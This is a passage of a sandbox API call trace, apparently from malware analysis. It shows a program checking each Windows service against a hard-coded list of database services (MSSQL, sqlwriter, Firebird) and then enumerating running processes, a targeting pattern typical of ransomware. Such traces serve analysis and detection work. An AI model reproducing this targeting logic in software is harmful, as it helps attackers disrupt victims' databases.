lpString2="DcomLaunch") returned 1 [0157.486] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0157.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0157.486] lstrlenW (lpString="DeviceAssociationService") returned 24 [0157.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0157.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0157.486] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0157.486] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0157.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0157.486] lstrlenW (lpString="Dhcp") returned 4 [0157.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0157.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0157.486] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0157.486] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0157.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0157.486] lstrlenW (lpString="Dnscache") returned 8 [0157.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0157.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0157.486] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0157.486] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0157.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0157.486] lstrlenW (lpString="DPS") returned 3 [0157.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0157.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0157.486] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0157.486] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0157.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0157.486] lstrlenW (lpString="DusmSvc") returned 7 [0157.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0157.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0157.486] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0157.486] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0157.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0157.486] lstrlenW (lpString="EventLog") returned 8 [0157.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0157.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0157.487] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0157.487] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0157.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0157.487] lstrlenW (lpString="EventSystem") returned 11 [0157.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0157.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0157.487] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0157.487] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0157.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0157.487] lstrlenW (lpString="FontCache") returned 9 [0157.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0157.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0157.487] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0157.487] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0157.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0157.487] lstrlenW (lpString="gpsvc") returned 5 [0157.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0157.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0157.487] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0157.487] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0157.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0157.487] lstrlenW (lpString="iphlpsvc") returned 8 [0157.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0157.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0157.487] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0157.487] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0157.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0157.487] lstrlenW (lpString="KeyIso") returned 6 [0157.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0157.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0157.487] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0157.487] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0157.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0157.487] lstrlenW (lpString="LanmanServer") returned 12 [0157.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0157.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0157.488] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0157.488] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0157.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0157.488] lstrlenW (lpString="LanmanWorkstation") returned 17 [0157.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0157.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0157.488] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0157.488] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0157.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0157.488] lstrlenW (lpString="lfsvc") returned 5 [0157.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0157.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0157.488] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0157.488] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0157.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0157.488] lstrlenW (lpString="lmhosts") returned 7 [0157.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0157.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0157.488] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0157.488] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0157.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0157.488] lstrlenW (lpString="LSM") returned 3 [0157.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0157.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0157.488] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0157.488] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0157.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0157.488] lstrlenW (lpString="MpsSvc") returned 6 [0157.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0157.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0157.488] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0157.488] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0157.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0157.489] lstrlenW (lpString="NcbService") returned 10 [0157.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0157.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0157.489] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0157.489] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0157.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0157.489] lstrlenW (lpString="netprofm") returned 8 [0157.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0157.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0157.489] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0157.489] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0157.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0157.489] lstrlenW (lpString="NgcSvc") returned 6 [0157.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0157.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0157.489] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0157.489] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0157.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0157.489] lstrlenW (lpString="NlaSvc") returned 6 [0157.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0157.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0157.489] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0157.489] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0157.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0157.489] lstrlenW (lpString="nsi") returned 3 [0157.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0157.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0157.489] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0157.489] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0157.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0157.489] lstrlenW (lpString="PcaSvc") returned 6 [0157.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0157.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0157.489] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0157.489] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0157.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0157.490] lstrlenW (lpString="PlugPlay") returned 8 [0157.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0157.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0157.490] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0157.490] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0157.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0157.490] lstrlenW (lpString="Power") returned 5 [0157.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0157.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0157.490] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0157.490] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0157.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0157.490] lstrlenW (lpString="ProfSvc") returned 7 [0157.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0157.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0157.490] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0157.490] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0157.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0157.490] lstrlenW (lpString="RpcEptMapper") returned 12 [0157.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0157.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0157.490] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0157.490] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0157.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0157.490] lstrlenW (lpString="RpcSs") returned 5 [0157.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0157.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0157.490] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0157.490] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0157.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0157.490] lstrlenW (lpString="SamSs") returned 5 [0157.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0157.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0157.490] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0157.490] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0157.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0157.490] lstrlenW (lpString="Schedule") returned 8 [0157.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0157.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0157.491] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0157.491] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0157.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0157.491] lstrlenW (lpString="SecurityHealthService") returned 21 [0157.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0157.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0157.491] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0157.491] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0157.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0157.491] lstrlenW (lpString="SENS") returned 4 [0157.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0157.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0157.491] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0157.491] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0157.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0157.491] lstrlenW (lpString="ShellHWDetection") returned 16 [0157.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0157.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0157.742] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0157.742] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0157.742] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0157.742] lstrlenW (lpString="Spooler") returned 7 [0157.742] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0157.742] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0157.742] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0157.742] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0157.742] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0157.742] lstrlenW (lpString="StateRepository") returned 15 [0157.742] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0157.742] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0157.742] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0157.742] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0157.742] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0157.742] lstrlenW (lpString="SysMain") returned 7 [0157.742] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0157.742] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0157.742] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0157.742] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0157.742] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0157.742] lstrlenW (lpString="SystemEventsBroker") returned 18 [0157.742] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0157.742] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0157.742] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0157.742] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0157.742] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0157.743] lstrlenW (lpString="Themes") returned 6 [0157.743] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0157.743] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0157.743] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0157.743] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0157.743] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0157.743] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0157.743] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0157.743] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0157.743] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0157.743] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0157.743] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0157.743] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0157.743] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0157.743] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0157.743] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0157.743] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0157.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x703a60 | out: hHeap=0x6a0000) returned 1 [0157.743] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x414 [0157.747] Process32FirstW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.748] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0157.749] lstrlenW (lpString="System") returned 6 [0157.749] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0157.750] lstrlenW (lpString="smss.exe") returned 8 [0157.750] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0157.751] lstrlenW (lpString="csrss.exe") returned 9 [0157.751] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0157.752] lstrlenW (lpString="wininit.exe") returned 11 [0157.752] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0157.752] lstrlenW (lpString="csrss.exe") returned 9 [0157.752] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0157.753] lstrlenW (lpString="winlogon.exe") returned 12 [0157.753] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0157.754] lstrlenW (lpString="services.exe") returned 12 [0157.754] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0157.755] lstrlenW (lpString="lsass.exe") returned 9 [0157.755] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0157.756] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0157.756] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0157.757] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0157.757] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.758] lstrlenW (lpString="svchost.exe") returned 11 [0157.758] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.759] lstrlenW (lpString="svchost.exe") returned 11 [0157.759] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0157.759] lstrlenW (lpString="dwm.exe") returned 7 [0157.759] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.760] lstrlenW (lpString="svchost.exe") returned 11 [0157.760] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.761] lstrlenW (lpString="svchost.exe") returned 11 [0157.761] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.762] lstrlenW (lpString="svchost.exe") returned 11 [0157.762] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.763] lstrlenW (lpString="svchost.exe") returned 11 [0157.763] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.764] lstrlenW (lpString="svchost.exe") returned 11 [0157.764] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.765] lstrlenW (lpString="svchost.exe") returned 11 [0157.765] Process32NextW (in: hSnapshot=0x414, 